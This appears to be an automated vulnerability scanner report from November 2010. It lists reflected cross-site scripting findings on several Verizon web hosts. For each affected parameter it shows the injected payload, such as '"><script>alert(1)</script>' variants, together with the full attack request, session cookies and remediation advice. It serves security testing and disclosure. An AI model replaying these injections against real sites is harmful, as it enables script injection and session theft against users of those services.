HTTP/1.1 200 OK Server: Apache Content-Length: 221 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Expires: Sat, 20 Nov 2010 02:07:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 02:07:57 GMT Connection: close Vary: Accept-Encoding Set-Cookie: VZCSESSIONID=0h8GMntdpL8cWDx9D4hWqZ5N1YLxWM7dWJj4G1SnRG8pZrG7PSc9!-552517484; path=/
The value of the web_search_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12a04"%3balert(1)//4994f840c79 was submitted in the web_search_type parameter. This input was echoed as 12a04";alert(1)//4994f840c79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='&web_search_type=basic12a04"%3balert(1)//4994f840c79&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1 Host: wapp.verizon.net Proxy-Connection: keep-alive Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=
Response (redirected)
HTTP/1.1 200 OK Server: Apache Content-Length: 221 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Expires: Sat, 20 Nov 2010 02:07:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 02:07:57 GMT Connection: close Vary: Accept-Encoding Set-Cookie: VZCSESSIONID=vnznMntdnppz3b1fGRLzPLpJCkPys1C1rnTyhKdsftXNHrRpy26h!-1123586183; path=/
The value of the WT.ti request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2114"-alert(1)-"2cd6e3349c6 was submitted in the WT.ti parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /central/bookmark?action=bbeat&WT.ti=Central/Header/vzsurround_lnkoute2114"-alert(1)-"2cd6e3349c6 HTTP/1.1 Host: www.verizon.net Proxy-Connection: keep-alive Referer: http://www.verizon.net/central/appmanager/portal/vzcentral Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 152 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Expires: Sat, 20 Nov 2010 01:47:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 01:47:43 GMT Connection: close Vary: Accept-Encoding
The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a257"-alert(1)-"dfffcb2575a was submitted in the channel parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /central/bookmark?action=googlesearch&q='&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr2a257"-alert(1)-"dfffcb2575a HTTP/1.1 Host: www.verizon.net Proxy-Connection: keep-alive Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 221 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Expires: Sat, 20 Nov 2010 02:07:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 02:07:38 GMT Connection: close
The value of the clientid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ff42"-alert(1)-"af559367478 was submitted in the clientid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /central/bookmark?action=googlesearch&q='&web_search_type=basic&clientid=cnsmr5ff42"-alert(1)-"af559367478&channel=Nwcnsmr HTTP/1.1 Host: www.verizon.net Proxy-Connection: keep-alive Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 221 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Expires: Sat, 20 Nov 2010 02:07:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 02:07:38 GMT Connection: close
3.99. http://www.verizon.net/central/bookmark [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.verizon.net
Path:
/central/bookmark
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ac8b"-alert(1)-"6833c2efbb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /central/bookmark?action=bbeat&WT.ti=Central/Header/vzsurround_lnkout&3ac8b"-alert(1)-"6833c2efbb9=1 HTTP/1.1 Host: www.verizon.net Proxy-Connection: keep-alive Referer: http://www.verizon.net/central/appmanager/portal/vzcentral Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 155 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Expires: Sat, 20 Nov 2010 01:47:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 01:47:45 GMT Connection: close Vary: Accept-Encoding
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5125b"-alert(1)-"3649764250f was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /central/bookmark?action=googlesearch&q='5125b"-alert(1)-"3649764250f&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1 Host: www.verizon.net Proxy-Connection: keep-alive Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 221 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Expires: Sat, 20 Nov 2010 02:07:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 02:07:36 GMT Connection: close Vary: Accept-Encoding
The value of the web_search_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63d6b"-alert(1)-"fda7c8459b2 was submitted in the web_search_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /central/bookmark?action=googlesearch&q='&web_search_type=basic63d6b"-alert(1)-"fda7c8459b2&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1 Host: www.verizon.net Proxy-Connection: keep-alive Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VZCSESSIONID=pzXmMnyQTb42YxPF5zChrLL6lWsx59ykGSv2bHvZypcp7dnglchj!1878479263; WT_FPC=id=2a956fa7855af7d0ca11290210227164:lv=1290210227164:ss=1290210227164; ASPSESSIONIDSAQTRRDD=PMLDAEBDKKNJNKIEJDFGBDKJ; ASPSESSIONIDCSRRSSBB=GPELJEBDJBIPHJOBICKILKME; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 221 X-Powered-By: Servlet/2.5 JSP/2.1 P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Expires: Sat, 20 Nov 2010 02:07:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 20 Nov 2010 02:07:37 GMT Connection: close
The value of the clientId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983ec"><script>alert(1)</script>841594c598 was submitted in the clientId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159a9"><script>alert(1)</script>cea6d5d8c05 was submitted in the action parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice159a9"><script>alert(1)</script>cea6d5d8c05&deviceType=Phones&sortOption=priceSort HTTP/1.1 Host: www.verizonwireless.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000
The value of the deviceType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd574"><script>alert(1)</script>6360605e49 was submitted in the deviceType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phonesbd574"><script>alert(1)</script>6360605e49&sortOption=priceSort HTTP/1.1 Host: www.verizonwireless.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000
The value of the item request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf659"><script>alert(1)</script>df6912777c8 was submitted in the item parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b2c/store/controller?item=phoneFirstbf659"><script>alert(1)</script>df6912777c8&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort HTTP/1.1 Host: www.verizonwireless.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000
3.106. http://www.verizonwireless.com/b2c/store/controller [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.verizonwireless.com
Path:
/b2c/store/controller
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f04d3"><script>alert(1)</script>cc1eed593b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort&f04d3"><script>alert(1)</script>cc1eed593b6=1 HTTP/1.1 Host: www.verizonwireless.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000
The value of the sortOption request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f90f"><script>alert(1)</script>154bd675ac6 was submitted in the sortOption parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceType=Phones&sortOption=priceSort7f90f"><script>alert(1)</script>154bd675ac6 HTTP/1.1 Host: www.verizonwireless.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GLOBALID=Pd7heRjrt%2FuCPQBUNOAuEUAvc6Cz3xUJf%2BIm%2FimB5ZUiXAkDciU7roQLCjQwOFAY; JSESSIONIDB2C=34HnMnybR3JjF5Q2QP6kh6v7nZvGF78XPGjlt264zvL1KcbBDCQb!383928044!cash!5106!-1; NSC_xxx_xmt_c2d_mcwt=44ad7f0825c2; NSC_xxx_hwt=c7ef56f80000
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2b92a(a)3fb18037f68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b793e(a)11cbe181d16 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12ba5'-alert(1)-'185cc5084d0 was submitted in the _pageLabel parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma ...[SNIP]... aderText");
var f_pageDefLabel = 'SMBPortal_page_main_marketplace12ba5'-alert(1)-'185cc5084d0'; if (f_pageDefLabel != "SMBPortal_page_SignIn") searchBox.focus(); }
The value of the 3828e"><script>alert(1)</script>450552b46bf request parameter is copied into the HTML document as plain text between tags. The payload 30dd7<script>alert(1)</script>5e4c65629c4 was submitted in the 3828e"><script>alert(1)</script>450552b46bf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 194d1<script>alert(1)</script>6bba43a7f86 was submitted in the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 MyVzServer: GWA25V Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Expires: Sat, 20 Nov 2010 00:55:10 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:55:10 GMT Connection: close Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:00:10 GMT; path=/foryourhome/registration/; domain=verizon.com Content-Length: 47430
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Verizon | Sign In</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta ...[SNIP]... </script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1194d1<script>alert(1)</script>6bba43a7f86" name="target"> ...[SNIP]...
3.113. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www22.verizon.com
Path:
/ForyourHome/Registration/Reg/OrLogin.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3828e"><script>alert(1)</script>450552b46bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>450552b46bf=1 HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
